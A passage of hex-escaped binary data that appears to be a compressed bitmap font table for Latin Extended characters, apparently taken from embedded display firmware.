x99\xc9\x03\xab\x03\xab\x99\xc9\x99\xc9\x99\x49\xa1\xc1\xa1\xb9\xa9\x31\xaa\x03\xba\x03\x31\x00\x01\x11\x1b\x4c\x46\x10\xce\x0d\xd9\x90\x8c\x1c\x4c\xd0\x50\x4c\x99\xf9\xec\x6a\x62\xa6\xe2\x62\x86\x64\x00\x01\x12\x19\xab\x4a\xd0\x8d\xa3\xf3\x83\x89\x83\x89\xc1\x3d\x3c\x10\x39\x10\x19\xdc\xc3\x83\x07\x01\x01\x13\x19\x0b\x46\xd0\x95\xa3\x7b\x88\xaa\x9b\x25\x52\x56\x07\x1f\x4e\x0e\x52\x85\x1c\x08\x59\x00\x01\x14\x1e\xeb\x4a\xd0\x05\x21\x19\x21\x21\x33\x7a\x88\x83\x89\x83\x89\xc1\x3d\x3c\x10\x39\x10\x19\xdc\xc3\x83\x07\x01\x01\x15\x1d\x4b\x46\xd0\x15\x21\x19\x21\x21\x33\x7a\x90\xaa\x9b\x25\x52\x56\x07\x1f\x4e\x0e\x52\x85\x1c\x08\x59\x00\x01\x16\x1a\xcb\x4a\xd0\x1d\x49\xf5\x20\x07\x13\x07\x13\x83\x7b\x78\x20\x72\x20\x32\xb8\x87\x07\x0f\x02\x01\x17\x19\x2b\x46\xd0\x2d\x49\xf5\x30\x55\x37\x4b\xa4\xac\x0e\x3e\x9c\x1c\xa4\x0a\x39\x10\xb2\x00\x01\x18\x1c\xcb\x4a\xce\x85\x83\x89\x83\x89\xc1\x3d\x3c\x10\x39\x10\x19\xdc\xc3\x83\x07\x41\x82\x92\xa2\x43\x00\x01\x19\x1a\x2b\x46\xce\x9d\xaa\x9b\x25\x52\x56\x07\x1f\x4e\x0e\x52\x85\x1c\x08\x99\x09\x4a\x8a\xce\x00\x01\x1a\x1d\xeb\x4a\xd0\x05\x21\x25\x62\x74\xf4\x10\x07\x13\x07\x13\x83\x7b\x78\x20\x72\x20\x32\xb8\x87\x07\x0f\x02\x01\x1b\x1c\x4b\x46\xd0\x15\x21\x25\x62\x74\xf4\x20\x55\x37\x4b\xa4\xac\x0e\x3e\x9c\x1c\xa4\x0a\x39\x10\xb2\x00\x01\x1c\x27\xef\x46\x50\x36\x5a\x52\x11\x41\x21\x79\xc8\x83\xa8\x03\x92\x32\x91\xd9\xe1\xd9\xe1\x5d\x5a\x1e\x4e\x0c\x4e\xd0\x8d\x54\xcd\x1c\x54\x1d\x84\x00\x01\x1d\x26\xec\xc6\x0d\x26\x42\x3a\x11\x29\x21\x79\x10\x92\x91\x83\x09\x1a\x8a\x29\x33\x3f\x9b\x98\xa9\xb8\x98\x21\x99\x9c\x14\x09\x1b\x39\x10\xba\x01\x01\x1e\x26\xef\x46\x50\x26\x75\x42\x82\xa6\xf4\xb0\x07\x51\x07\x24\x65\x22\xb3\xc3\xb3\xc3\xbb\xb4\x3c\x9c\x18\x9c\xa0\x1b\xa9\x9a\x39\xa8\x3a\x08\x01\x01\x1f\x25\xec\xc6\x0d\x16\x21\xad\xec\xe8\x81\x48\x46\x0e\x26\x68\x28\xa6\xcc\xfc\x6c\x62\xa6\xe2\x62\x86\x64\x72\x52\x24\x6c\xe4\x40\xe8\x06\x00\x01\x20\x23\xcf\x46\x50\x3e\x69\xf5\xc0\x07\x51\x07\x24\x65\x22\xb3\xc3\xb3\xc3\xbb\xb4\x3c\x9c\x18\x9c\xa0\x1b\xa9\x9a\x39\xa8\x3a\x08\x01\x01\x21\x22\xcc\xc6\x0d\x2e\x51\xf5\x50\x24\x23\x07\x13\x34\x14\x53\x66\x7e\x36\x31\x53\x71\x31\x43\x32\x39\x29\x12\x36\x72\x20\x74\x03\x01\x22\x27\x6f\xc7\x4b\xb6\x83\xa8\x03\x92\x32\x91\xd9\xe1\xd9\xe1\x5d\x5a\x1e\x4e\x0c\x4e\xd0\x8d\x54\xcd\x1c\x54\x1d\xc4\x43\x0e\xaf\xd6\x58\x5a\x0c\x00\x01\x23\x25\x2c\xc7\x0d\x36\x49\x51\xd1\xc9\xf5\x40\x24\x23\x07\x13\x34\x14\x53\x66\x7e\x36\x31\x53\x71\x31\x43\x32\x39\x29\x12\x36\x72\x20\x74\x03\x01\x24\x17\xee\x4a\x50\x2e\x52\x4a\x11\x39\x21\x79\x90\x41\xff\xf0\xe0\x03\x43\xff\x70\x00\x01\x25\x29\xec\x46\x10\x16\x42\x3a\x11\x29\x21\x79\x90\xc9\x3d\xa1\x99\x30\xa9\x99\x20\x9a\x98\x9a\x98\x9a\x98\x9a\x98\x9a\x98\x9a\x98\x9a\x98\x9a\x98\x9a\x98\x1a\x01\x26\x13\x4e\x4a\x50\x86\x41\x0f\x0f\x3e\x30\x34\x3c\xf8\xc0\xd0\x3f\x1c\x01\x27\x15\x4b\x4a\x10\x86\xc1\x85\x65\x65\x23\x24\x13\x16\x35\x47\x56\xfe\xab\x01\x01\x28\x10\xc8\x42\xf0\x8c\x99\x03\x92\xd9\xa9\xfd\xff\x1b\x00\x01\x29\x0f\x28\x42\xf0\x8c\x99\x03\x92\xd9\xa9\xfd\xdf\x00\x01\x2a\x0d\xa7\x42\xf0\x84\x97\x43\xfb\xff\x27\x00\x01\x2b\x0c\x07\x42\xf0\x84\x97\x43\xfb\x3f\x01\x01\x2c\x11\xe8\x42\xf0\x04\x21\x22\x09\x1b\xe2\xa9\xfd\xff\x1b\x00\x01\x2d\x10\x48\x42\xf0\x04\x21\x22\x09\x1b\xe2\xa9\xfd\xdf\x00\x01\x2e\x0f\xc4\x4a\xee\x84\x89\xfd\xff\x13\x09\x11\x99\x01\x01\x2f\x10\xc4\x4a\xee\x84\x89\x95\x13\xfb\x3f\x91\x10\x91\x19\x01\x30\x0c\xc3\x4a\xf0\x0c\x6d\x0e\xfe\x41\x01\x01\x31\x09\xa3\x49\xf0\x84\x3f\x20\x01\x32\x11\xcc\x4a\xee\x85\x31\xff\xff\xb3\xc9\xc1\x29\xb3\x1a\x00\x01\x33\x15\xec\xca\xed\x85\x31\x67\xf3\x90\x63\xfe\x3f\x9b\x5c\x14\x33\x75\x55\x03\x01\x34\x16\x6a\x3f\x0e\x25\x32\x2a\x11\x19\x21\x79\x80\xb9\xfd\xff\x67\x33\x46\x55\x00\x01\x35\x16\xea\xbe\x0d\x25\x32\x2a\x11\x19\x21\x79\x80\xb9\xfd\x7f\x12\x33\x73\x53\x05\x01\x36\x2f\x6e\xcb\x0b\x86\xb9\x89\x31\x99\xa9\x99\xa1\x45\x52\x33\x62\x23\x63\x13\x73\x86\x77\x13\x64\x23\x54\x33\x44\x43\x34\x43\x34\x53\x24\x63\x14\x73\xf4\x40\xb3\x8b\xb5\x15\x96\x03\x01\x37\x28\x6c\xcb\xeb\x85\xc9\xbd\x9a\x18\x1a\x99\x59\x32\x34\x22\x35\x21\x76\x35\x41\x34\x51\x33\x42\x33\x43\x32\x44\x31\x45\x0f\x31\xb9\x54\x4b\x51\x31\x00\x01\x38\x1f\xac\x49\xf0\x85\xa9\x89\xa1\x91\x99\x25\x43\x23\x52\x13\x62\x57\x13\x44\x13\x35\x23\x34\x33\x24\x43\x14\x53\x04\x01\x39\x11\xeb\x4a\xb0\x9d\x41\xed\x81\x06\xf7\xff\xc3\x83\x07\x01\x01\x3a\x0e\xe5\x4a\xf0\x94\x11\x0d\x47\xf6\xff\x4f\x00\x01\x3b\x14\x6b\xcb\xab\x85\xc1\xfd\xff\xf0\xe0\x41\xf8\xe0\x4a\x0d\x25\xc5\x00\x01\x3c\x10\x63\xcb\xeb\x84\xff\xa0\xe6\x40\x42\x05\x85\x04\x00\x01\x3d\x13\x4e\x4a\x50\x86\x41\x2f\x1b\x4a\xcc\xee\xdf\x1e\xd0\x1c\xd0\x00\x01\x3e\x0f\x49\x4a\xb0\x85\x19\x8f\xda\x48\x8c\xed\x7f\x06\x01\x3f\x27\x53\x4a\x90\x87\x79\x88\x79\x88\x79\x88\x79\x88\x79\x88\x79\x88\x79\x88\x79\x88\x79\x88\x69\xef\x21\xe6\x21\xe6\x21\xe6\x21\x0e\x08\x0f\x08\x01\x01\x40\x0e\x4e\x4a\xf0\x86\xd9\xfd\x43\x6f\xf7\x16\x00\x01\x41\x18\x4e\x42\xb0\x9d\xd9\x3d\x09\x9c\x10\x34\x24\x2c\x34\x0c\x99\xdd\xed\x01\xcd\x01\x01\x01\x42\x13\x49\x42\xf0\x9c\xb1\x3d\x89\xb1\xa9\xa1\xb1\x09\x19\xdb\x6f\x00\x01\x43\x26\xee\x4a\x70\xb6\x59\xed\xe1\x26\x0d\x0d\xef\x0e\xc2\x28\xc6\x28\xa8\x48\x88\x68\x86\x88\x66\x88\x48\xa8\x28\xc8\x26\xc8\x0e\xe2\x0e\x5d\x0e\x01\x44\x14\x4b\x4a\x10\xae\x41\xed\x41\x46\x48\x26\x2c\x6a\x8e\xac\xfc\x57\x03\x01\x45\x2a\x6e\xcb\x6b\x86\x49\x43\xc3\xbb\x83\x30\x8a\x31\x0a\x2a\x12\x22\x9a\x21\xa2\x19\x22\x12\x2a\x0a\xb2\x09\xb2\x83\xb8\x43\x97\xf3\x50\xb3\x8b\xb5\x15\x16\x03\x01\x46\x18\xcb\xca\x0b\x86\x11\x92\x09\x8b\x9a\x23\x2b\xff\xd5\x3c\xc0\xe0\x4a\x0d\x25\xa5\x00\x01\x47\x2a\xee\x4a\x70\x16\x21\x39\x11\x49\x52\x7a\xa8\x49\x43\xc3\xbb\x83\x30\x8a\x31\x0a\x2a\x12\x22\x9a\x21\xa2\x19\x22\x12\x2a\x0a\xb2\x09\xb2\x83\xb8\x43\x97\x03\x01\x48\x17\x4b\x4a\x10\x0e\x21\x25\x62\x74\xf4\x00\x23\x24\x13\x16\x35\x47\x56\xfe\xab\x01\x01\x49\x2c\x52\x46\xd0\x86\x79\x80\x79\x80\x79\x08\x79\x08\x79\x00\xa9\x11\xca\x09\xc3\x9a\x39\xa2\xb9\xa9\xb9\xa9\xb9\xa9\xb9\xa9\xb9\xa9\xb9\xa9\xb9\xa9\xb9\xa9\xb9\xa9\x01\x01\x4a\x29\xee\xca\x6d\x86\x49\x43\xc3\xbb\x83\x30\x8a\x31\x0a\x2a\x12\x22\x9a\x21\xa2\x19\x22\x12\x2a\x0a\xb2\x83\xb0\x83\xb8\x43\x97\xb3\xcb\x62\xe6\xee\x6a\x00\x01\x4b\x17\x4b\xca\x0d\x86\x11\x92\x09\x8b\x9a\x23\x2b\xff\xd5\xe0\x9a\x98\xa1\xa3\x1a\x00\x01\x4c\x23\xb1\x46\x70\xae\xd3\x7b\xe0\xc3\x03\x2a\x36\x74\x24\x93\x23\x93\x13\xb3\x7e\x3b\x31\x39\x32\x39\x42\x47\x43\x45\x75\x40\x78\x05\x01\x4d\x1b\x0d\x46\xf0\x9d\xb3\x7b\xa8\xb2\x03\x19\x26\x53\x13\x73\xbe\x9b\x98\x1a\xa1\xa1\x39\x10\x2b\x02\x01\x4e\x27\xf1\x46\x70\x2e\x21\x49\x21\x51\x63\x7a\xe8\xc3\x03\x2a\x36\x74\x24\x93\x23\x93\x13\xb3\x7e\x3b\x31\x39\x32\x39\x42\x47\x43\x45\x75\x40\x78\x05\x01\x4f\x1f\x4d\x46\xf0\x1d\x21\x29\x21\x31\x43\x7a\xb0\xb2\x03\x19\x26\x53\x13\x73\xbe\x9b\x98\x1a\xa1\xa1\x39\x10\x2b\x02\x01\x50\x29\xf1\x46\x70\x46\x09\xe1\x08\xe1\x90\x60\x89\x78\xf0\xc3\x03\x2a\x36\x74\x24\x93\x23\x93\x13\xb3\x7e\x3b\x31\x39\x32\x39\x42\x47\x43\x45\x75\x40\x78\x05\x01\x51\x21\x4d\x46\xf0\x35\x09\xc1\x08\xc1\x90\x40\x89\x78\xb8\xb2\x03\x19\x26\x53\x13\x73\xbe\x9b\x98\x1a\xa1\xa1\x39\x10\x2b\x02\x01\x52\x30\x57\x46\x30\x2f\x8b\x83\xa1\x83\x83\x1a\xa2\x4a\x32\xca\xc1\x41\xc2\x95\x83\x93\x83\x93\x07\x22\x93\x07\x22\x93\x83\x93\x83\x84\x93\x83\x93\x64\xa4\x44\xb5\x07\x07\x56\x16\x07\x04\x01\x53\x28\xb4\x45\xf0\xa6\x9a\xaa\x83\x88\x83\x10\x9a\x9a\x91\x21\x2a\xb3\x29\xb3\x83\xb3\x83\xb3\xc1\xb1\xc9\xa1\x42\x1a\xab\x90\x83\x88\x03\x19\x23\x0b\x00\x01\x54\x2b\xed\x4a\x10\xb6\x51\xed\xa1\x0e\xa2\x0e\x66\x86\x48\xa6\x46\xa6\x46\xa6\x46\xa6\x46\x86\x66\x16\x9d\x1d\x44\x8d\x10\xcd\x0c\xad\x19\x22\x99\xa2\x18\x9b\x18\x23\x01\x55\x12\x48\x4a\x50\xa5\x29\x8d\x47\x2c\x0e\x64\x88\xa6\xf6\x57\x00\x01\x56\x2f\x6d\xcb\x0b\x86\x83\xa8\x83\x99\x21\x92\xa9\x91\xa9\x91\xa9\x91\xa9\x91\xa1\x99\x45\x67\x07\x51\x23\x44\x33\x43\x6b\x86\x48\xa6\x28\xc6\x26\xc6\xe8\x61\x46\xd7\x6a\x2a\x2b\x06\x01\x57\x15\xc8\xca\x4b\x85\x11\x8b\x03\x19\xa2\xa9\xfd\xf9\xd4\x32\xad\xc4\xa4\x00\x01\x58\x2f\xed\x4a\x10\x16\x21\x31\x11\x41\x4a\x7a\x98\x83\xa8\x83\x99\x21\x92\xa9\x91\xa9\x91\xa9\x91\xa9\x91\xa1\x99\x45\x67\x07\x51\x23\x44\x33\x43\x6b\x86\x48\xa6\x28\xc6\x26\xc6\x08\x01\x59\x16\x48\x4a\x50\x05\x21\x09\x11\x19\x22\xd2\x11\x8b\x03\x19\xa2\xa9\xfd\x15\x00\x01\x5a\x1d\xeb\x46\xb0\xad\x41\xed\xa1\x6c\x0e\x44\x86\x24\x06\x17\xd6\xd5\xd9\x15\x32\x5c\x58\x35\x71\x20\x73\x03\x01\x5b\x19\x49\x4a\xb0\xa5\x31\xed\x21\x4c\x2e\x86\x22\xc6\xa8\x6e\x8e\xcc\xc6\x88\x0e\x4a\x4c\x00\x01\x5c\x20\xeb\x46\xb0\x1d\x3a\x32\x11\x21\xf5\x10\x36\x07\x22\x43\x12\x83\x0b\xeb\xea\xec\x0a\x19\x2e\xac\x9a\x38\x90\xb9\x01\x01\x5d\x1b\x49\x4a\xb0\x15\x2a\x22\x11\x45\xc2\x26\x17\x43\x11\x63\x54\x37\x47\x66\x63\x44\x07\x25\x26\x00\x01\x5e\x1f\xeb\xc6\xad\x1d\x9b\x03\x91\x21\x89\xc1\x85\x75\x75\x76\x85\x0c\x17\x56\x4d\x1c\xc8\x1c\x4a\xc6\x4a\xca\x0d\x01\x01\x5f\x1b\x49\xca\xad\x15\x93\x8b\xa1\x88\x31\xaa\x9b\x23\xb3\x31\xa2\x83\x12\x33\xb9\x48\x39\xa9\x19\x00\x01\x60\x20\xeb\x46\xb0\x15\x21\x25\x62\x74\xf4\x20\x36\x07\x22\x43\x12\x83\x0b\xeb\xea\xec\x0a\x19\x2e\xac\x9a\x38\x90\xb9\x01\x01\x61\x1b\x49\x4a\xb0\x0d\x21\x11\x45\x54\xd4\x26\x17\x43\x11\x63\x54\x37\x47\x66\x63\x44\x07\x25\x26\x00\x01\x62\x14\xef\xc2\x0d\x86\x1f\x88\x0d\xef\xff\xd7\xd2\xf1\x00\xd2\xb2\x63\x00\x01\x63\x17\xa8\xc6\x2d\x95\xa9\x35\x07\x07\x22\x53\xfb\xb3\x22\x22\xb1\x40\x31\xa1\x11\x00\x01\x64\x15\xef\x42\x10\x26\x85\x22\xa2\xb4\xf4\x50\x07\x1f\x88\x0d\xef\xff\x67\x00\x01\x65\x18\x4c\x46\xf0\xcd\x25\x43\x23\x53\x22\x53\x07\x13\x12\x07\x61\x93\xfb\xd3\x42\x22\x00\x01\x66\x0e\x4f\x42\x10\x86\x1f\x88\x0d\xef\xff\x67\x00\x01\x67\x14\x08\x46\x30\x95\xa9\x35\x07\x07\x22\x53\xab\x88\x88\xa6\x36\x2b\x22\x01\x68\x19\xcd\x4a\x30\x9e\x99\xa8\x83\x28\x91\x79\x90\xc1\xfe\x3f\x34\x9b\x20\x9a\x39\x90\xba\x01\x01\x69\x16\x2b\x4a\x10\x9e\x99\x98\x83\x18\x91\xe9\x29\xff\xa3\x9b\x0a\x8b\x11\x92\x01\x01\x6a\x15\xad\x4a\x30\x96\xb3\x7b\x90\xc1\xfe\x3f\x34\x9b\x20\x9a\x39\x90\xba\x01\x01\x6b\x12\x0b\x4a\x10\x96\xa3\xeb\x29\xff\xa3\x9b\x0a\x8b\x11\x92\x01\x01\x6c\x19\xed\x4a\x30\x16\x21\x29\x21\x31\x43\x7a\x98\xc1\xfe\x3f\x34\x9b\x20\x9a\x39\x90\xba\x01\x01\x6d\x16\x4b\x4a\x10\x16\x21\x19\x21\x21\x33\xf2\x29\xff\xa3\x9b\x0a\x8b\x11\x92\x01\x01\x6e\x19\xed\x4a\x30\x2e\xd1\x90\xc8\x90\x50\x79\xa0\xc1\xfe\x3f\x34\x9b\x20\x9a\x39\x90\xba\x01\x01\x6f\x17\x4b\x4a\x10\x2e\xc1\x90\xb8\x90\x40\x79\x80\x29\xff\xa3\x9b\x0a\x8b\x11\x92\x01\x01\x70\x1b\xed\x4a\x30\x2e\x09\xc1\x08\xc1\x90\x40\x89\x78\xa0\xc1\xfe\x3f\x34\x9b\x20\x9a\x39\x90\xba\x01\x01\x71\x19\x4b\x4a\x10\x2e\x09\xb1\x08\xb1\x90\x30\x89\x78\x80\x29\xff\xa3\x9b\x0a\x8b\x11\x92\x01\x01\x72\x16\xcd\x4a\x2e\x86\xc1\xfe\x3f\x34\x9b\x20\x9a\x39\x90\xba\x14\x95\x15\x1e\x02\x01\x73\x15\x2b\x4a\x0e\x86\x29\xff\xa3\x9b\x0a\x8b\x11\x92\x29\x41\x49\xd1\x19\x00\x01\x74\x46\xf5\x42\xb0\x46\x7a\x10\x7a\x08\x11\x71\x21\x79\xe8\xb1\xb9\xb2\x31\x33\x2a\x91\xa1\x2a\x91\xa1\x2a\x91\xa1\x22\x99\x21\x89\x19\xa1\x19\x89\x19\xa1\x11\x91\x19\xa1\x11\x91\x11\xa9\x11\x11\x0a\xb1\x09\x99\x09\xb1\xa2\x09\xb1\xa2\xba\xa2\x42\x2a\x42\xaa\xc9\xb1\x29\x00\x01\x75\x3a\x53\x42\x70\x46\x7a\x00\x72\x11\x61\x21\x79\x48\xb1\x31\x09\xa9\x29\x11\xa9\x29\x11\x21\x09\x21\x11\x21\x09\x19\x21\x19\x09\x19\x21\x11\x91\x11\x21\x11\x19\x09\x31\x09\x19\x09\x31\x22\x09\x31\xaa\x39\xaa\x41\xb1\x21\x00\x01\x76\x22\xef\x42\x10\x2e\x5a\x52\x11\x41\x21\x79\xa0\xc9\x89\x41\x11\x32\xa1\x31\x21\x22\xb1\x99\x31\x12\xc1\xcb\x52\xe2\xfd\x19\x00\x01\x77\x29\xed\xc2\xad\x25\x4a\x42\x11\x31\x21\x79\x88\x41\x33\x91\x31\x91\xa9\x11\x22\xa1\x21\x21\x12\xb1\x11\xb1\x09\x39\xc3\x42\xd2\x51\x59\xd1\x51\xd1\x39\x00\x01\x78\x20\xaf\x42\x10\x26\x19\x41\x19\x79\xa0\xc9\x89\x41\x11\x32\xa1\x31\x21\x22\xb1\x99\x31\x12\xc1\xcb\x52\xe2\xfd\x19\x00\x01\x79\x1d\xed\x46\xf0\xc5\x51\xed\x81\x0e\x2a\x0e\x2a\x29\x57\x12\x52\x4e\x12\x52\x4e\x12\xb2\x9c\xa4\x3c\x78\x50\x01\x7a\x15\x4b\x4a\xd0\xb5\x41\xed\x21\x0e\x1e\x04\x6a\x38\xb7\xa1\xc2\x83\x07\x01\x01\x7b\x1d\xcd\x46\xf0\x3d\x59\xf5\x30\x07\x15\x07\x95\x94\x2b\x09\x29\x27\x09\x29\x27\x09\x59\x4e\x52\x1e\x3c\x28\x01\x7c\x14\x2b\x4a\xd0\x2d\x49\xf5\x00\x1f\x04\x6a\x38\xb7\xa1\xc2\x83\x07\x01\x01\x7d\x21\xed\x46\xf0\x1d\x21\x31\x11\x41\x4a\x7a\x98\x83\x8a\x83\x4a\xca\x95\x84\x94\x93\x84\x94\x93\x84\x2c\x27\x29\x0f\x1e\x14\x01\x7e\x17\x4b\x4a\xd0\x15\x21\x25\x62\x74\xe4\x07\x0f\x02\x35\x9c\xdb\x50\xe1\xc1\x83\x00\x01\x86\x1c\x4f\x46\x30\x96\x83\xa8\x83\x9a\xa9\x92\x48\xe2\x61\xe2\x7d\x3b\x3c\x3b\x22\x56\x72\x40\x75\x10\x06\x01\x89\x2c\x52\x42\x70\x9e\x83\xc1\x83\xb2\x31\xaa\x39\xa2\xc1\xa1\x41\x9a\xc9\x99\xc9\x03\xab\x03\xab\x99\xc9\x99\xc9\x99\x49\xa1\xc1\xa1\xb9\xa9\x31\xaa\x03\xba\x03\x31\x00\x01\x8e\x14\x4b\x4a\xd0\x85\x0f\x02\xf7\xc9\x81\xc8\x81\xe0\xbe\x38\x98\x38\x18\x01\x92\x1b\xcc\x4e\x0e\xbe\xaa\x2b\xc9\x85\x93\xcb\x0e\x82\x0e\xe2\x26\x07\x27\x37\x9c\xdc\x70\x72\x12\x00\x01\x97\x0a\x43\x4a\xf0\x84\xff\xa0\x00\x01\x9a\x0a\x43\x4a\xf0\x84\xff\xa0\x00\x01\x9d\x39\xf3\xb6\x6d\xae\x49\x29\x42\x29\x42\xa9\x3a\x29\x33\x29\x89\x31\x29\x09\x2a\x25\x44\x52\x32\x43\x52\x42\x33\x52\x42\x24\x52\x52\x14\x52\x2b\xa4\xa6\xac\xc6\xaa\xe6\xa8\xe6\xa8\x06\xa7\xe6\x21\x66\x63\x86\x8f\xcb\x01\x01\x9f\x24\x51\x46\x70\xae\xc3\x03\x2a\x36\x74\x24\x93\x23\x93\x13\xb3\xb6\x07\x3f\xa8\xb5\x9d\x98\x1c\x99\x1c\xa1\xa3\xa1\xa2\x3a\x20\xbc\x02\x01\xa0\x2c\x52\x46\x70\xae\x9b\x99\x03\x8a\x11\xaa\x0b\x3a\x8b\xc9\x8a\x49\x8a\xd9\x89\xd9\x89\xd9\x89\xd9\x89\xd9\x89\xd9\x91\xc9\x99\xc9\x19\x3a\x22\x2a\xb2\x03\xca\x33\x00\x01\xa1\x22\xaf\x45\xf0\xa5\x9a\x91\x03\x89\x09\x9a\x8b\xa9\x89\xba\x83\x38\x8a\xb9\x91\xb9\x91\xb9\x99\xa9\x21\x1a\xaa\x03\xc1\x32\x00\x01\xa7\x1c\x4b\x46\xb0\x15\xa3\x03\x11\xa1\xc9\xc1\x65\x55\x45\x46\x55\x64\x74\x83\x2b\xa7\x44\x0e\x64\x2e\x00\x01\xa8\x18\xa9\x49\xb0\x0d\x9b\x93\xa0\xb1\x29\x92\x8b\x0b\x9b\xb1\x31\xa2\x88\x83\x10\x0b\x00\x01\xae\x12\xef\xc2\x0d\x86\x1f\x88\x0d\xef\xff\x5f\xcf\x04\x9e\x56\x00\x01\xaf\x22\x4f\x4a\x30\x86\xc1\x3f\x9c\x18\x14\x19\x14\x19\x14\x19\x14\x19\x14\x19\x14\x19\x14\x19\x14\x21\x9b\x21\x9a\x3a\x90\xbb\x02\x01\xb0\x22\xad\x49\x10\x86\xa9\x83\xa8\x83\xa8\x83\xa8\x83\xa8\x83\x28\x8a\xa9\x91\xa9\x91\xa9\x91\x21\x92\x99\x1a\x8b\x21\x92\x11\x00\x01\xb5\x1a\x4d\x46\xf0\x8d\x83\x8a\x83\x4a\xca\x95\x84\x94\x93\x84\x94\x93\x84\x2c\x27\x29\x0f\x1e\x14\x01\xb6\x11\xab\x49\xd0\x85\x0f\x02\xb5\xa3\xdb\x50\xe1\xc1\x83\x00\x01\xbb\x1b\x4b\x4a\x10\x16\x9b\x83\x09\xa9\xc9\xc1\xed\x26\x0e\x1e\x04\x91\xcd\x0d\x0a\xce\x0d\x1e\x3c\x08\x01\xbc\x14\x49\x4e\x10\x86\x07\x76\xda\x15\x9d\x31\xdb\x55\x0d\xc5\x89\x0d\x00\x01\xc0\x09\xc2\x4a\xee\x84\x7f\x20\x01\xc2\x14\xce\x46\x0e\x36\x61\xfd\xec\xe0\x33\x61\xb1\x83\xcf\x84\xf5\x33\x00\x01\xc3\x0a\x42\x4e\x10\x85\x0f\x8a\x0c\x01\xcd\x2c\xf1\x42\x30\x2e\x21\x51\x11\x61\x6a\x7a\x04\xe3\xc4\x8d\x25\x46\x45\x46\x45\x08\x67\x06\x85\x06\xa5\xc6\xc4\xc6\x0e\x8a\x0e\x8c\x04\x87\x24\x47\x44\x47\x44\x8d\x07\x01\xce\x23\x4c\x46\xd0\x15\x21\x29\x11\x39\x42\x7a\x20\xa3\x03\x99\xa8\xc9\x55\x37\x07\x22\x34\x23\x43\x23\x43\x23\x33\x34\x16\x24\x34\x03\x01\xcf\x12\xe8\x42\xf0\x04\x21\x09\x11\x19\x22\xe2\xa9\xfd\xff\x1b\x00\x01\xd0\x11\x48\x42\xf0\x04\x21\x09\x11\x19\x22\xe2\xa9\xfd\xdf\x00\x01\xd1\x27\xf1\x46\x70\x2e\x21\x51\x11\x61\x6a\x7a\xe8\xc3\x03\x2a\x36\x74\x24\x93\x23\x93\x13\xb3\x7e\x3b\x31\x39\x32\x39\x42\x47\x43\x45\x75\x40\x78\x05\x01\xd2\x1f\x4d\x46\xf0\x1d\x21\x31\x11\x41\x4a\x7a\xb0\xb2\x03\x19\x26\x53\x13\x73\xbe\x9b\x98\x1a\xa1\xa1\x39\x10\x2b\x02\x01\xd3\x19\xed\x4a\x30\x16\x21\x31\x11\x41\x4a\x7a\x98\xc1\xfe\x3f\x34\x9b\x20\x9a\x39\x90\xba\x01\x01\xd4\x15\x4b\x4a\x10\x16\x21\x25\x62\x74\xe4\x53\xfe\x47\x37\x15\x16\x23\x24\x03\x01\xd5\x1a\x0d\x4b\x30\x9e\xb3\x7b\x20\x19\x31\x19\x79\x88\xc1\xfe\x3f\x34\x9b\x20\x9a\x39\x90\xba\x01\x01\xd6\x17\x6b\x4a\x10\x96\xa3\x7b\x00\x19\x21\x19\xe9\x29\xff\xa3\x9b\x0a\x8b\x11\x92\x01\x01\xd7\x1b\x4d\x4b\x30\xb6\x51\xed\x01\x65\xc4\x64\xe4\x21\x06\xfb\xff\xd0\x6c\x82\x68\xe6\x40\xea\x06\x00\x01\xd8\x16\xab\x4a\x10\xb6\x41\xed\x61\x14\xc9\x48\x4f\xf9\x1f\xdd\x54\x58\x8c\x90\x0c\x01\xd9\x1e\x4d\x4b\x30\x16\x21\x31\x11\x41\x4a\x7a\x30\x19\x31\x19\x79\x88\xc1\xfe\x3f\x34\x9b\x20\x9a\x39\x90\xba\x01\x01\xda\x1a\xab\x4a\x10\x16\x21\x25\x62\x74\xf4\x10\x32\x42\x32\xd2\x53\xfe\x47\x37\x15\x16\x23\x24\x03\x01\xdb\x1b\x4d\x4b\x30\x9e\x59\x61\xf5\x60\x32\x62\x32\xf2\x10\x83\xfd\x7f\x68\x36\x41\x34\x73\x20\x75\x03\x01\xdc\x18\xab\x4a\x10\x96\x49\x51\xf5\x20\x32\x42\x32\xd2\x53\xfe\x47\x37\x15\x16\x23\x24\x03\x01\xdd\x17\xab\x45\xd0\x0d\xa3\x03\x91\x28\xc2\xc9\xc1\x83\xaf\xac\x44\x66\x66\xae\x6a\x00\x01\xde\x2d\x11\x43\x30\xae\xd3\x7b\x60\x19\x51\x19\x79\xf0\x71\xe2\xc6\x12\xa3\x22\xa3\x22\x84\x33\x83\x42\x83\x52\x63\x62\x63\x07\x45\x07\x46\x82\x43\x92\x23\xa2\x23\xa2\xc6\x03\x01\xdf\x24\x6c\x46\xd0\x95\xab\x7b\x10\x19\x29\x19\x79\x18\xa3\x03\x99\xa8\xc9\x55\x37\x07\x22\x34\x23\x43\x23\x43\x23\x33\x34\x16\x24\x34\x03\x01\xe0\x2e\x31\x43\x30\xae\xd3\x7b\x04\xf2\x00\xf2\x00\xf2\x28\xc6\x89\x1b\x4b\x8c\x8a\x8c\x8a\x10\xce\x0c\x0a\x0d\x4a\x8d\x89\x8d\x1d\x14\x1d\x18\x09\x0e\x49\x8e\x88\x8e\x88\x1a\x0f\x01\xe1\x22\x8c\x46\xd0\x9d\xab\x7b\x20\x51\xf5\x50\x46\x07\x32\x51\x93\xab\x6e\x0e\x44\x68\x46\x86\x46\x86\x46\x66\x68\x2c\x48\x68\x06\x01\xe2\x34\xb6\x42\xf0\xce\x7b\x80\x7b\x84\x07\xb4\x07\xa4\xf5\x10\xf6\x10\x12\xf3\x00\x13\xf3\x00\x22\xe3\x32\xd3\x33\x07\x72\x42\x07\x62\x43\xc3\x07\xb3\x07\xb4\x62\xa3\x72\x93\x73\x93\x82\x07\x87\x07\x04\x01\xe3\x2a\x12\x46\xb0\xb6\xdb\x7b\xd8\x1a\xa2\x83\x03\x91\x28\x9a\xc1\xa9\xb9\xa9\x99\x83\x83\x88\x83\x37\x83\x43\x83\x43\x74\x33\x12\x53\x11\x36\x07\x21\x54\x16\x00\x01\xe4\x20\x4f\x46\x50\xb6\x83\xa8\x03\x92\x32\x91\xd9\xe1\xd9\xe1\x5d\x5a\x1e\x4e\x0c\x4e\xd0\x8d\x54\xcd\x1c\x54\x1d\x84\x00\x01\xe5\x1e\x4c\xc6\x0d\x1e\x92\x91\x83\x09\x1a\x8a\x29\x33\x3f\x9b\x98\xa9\x78\xf0\xc0\x52\x24\x6c\xe4\x40\xe8\x06\x00\x01\xe6\x26\xef\x46\x50\x26\x85\x22\xa2\xb4\xf4\xb0\x07\x51\x07\x24\x65\x22\xb3\xc3\xb3